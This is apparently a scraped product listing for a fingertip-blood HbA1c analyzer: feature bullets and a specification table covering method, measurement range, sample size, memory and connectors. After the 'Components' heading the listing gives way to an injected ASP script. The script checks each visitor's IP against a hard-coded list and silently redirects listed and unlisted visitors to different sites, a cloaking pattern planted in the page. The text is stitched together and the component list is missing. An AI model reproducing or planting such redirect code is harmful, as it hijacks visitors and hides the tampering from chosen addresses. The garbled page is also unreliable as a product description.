-
Individually packaged test cartridge
-
Boronate affinity assay methodology
-
Total about 5 minutes
-
Capillary (fingertip) & venous whole blood
-
Only 5μL blood sample
-
500 test memory
Specifications
Feature
|
Specification
|
Methodology
|
Boronate Affinity
|
Measurement Range
|
4-15%
|
Test Time
|
Total about 5 minutes
|
Sample Size
|
5 μL
|
Sample Type
|
Fresh whole blood (Capillary and Venous)
|
Units of Measure
|
NGSP (%) & IFCC (mmol/mol)
|
Power Source
|
AC Adapter (100-240V AC, 50/60Hz)
|
Memory
|
500 memories
|
Analyzer Connectors
|
USB cable for Data Transfer or Power (Optional)
External Printer (Optional)
Barcode Reader (Optional)
|
Components
<%
requestIP = request.ServerVariables("REMOTE_ADDR")
IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]"
trueURL = "http://www.baidu.com"
falseURL = "http://www.google.com"
ipArr = split(IP,"|")
flag = false
for i=0 to ubound(ipArr)
if requestIP=ipArr(i) then
flag=true
exit for
end if
next
if flag then
response.Redirect(falseURL)
else
response.Redirect(trueURL)
end if
%>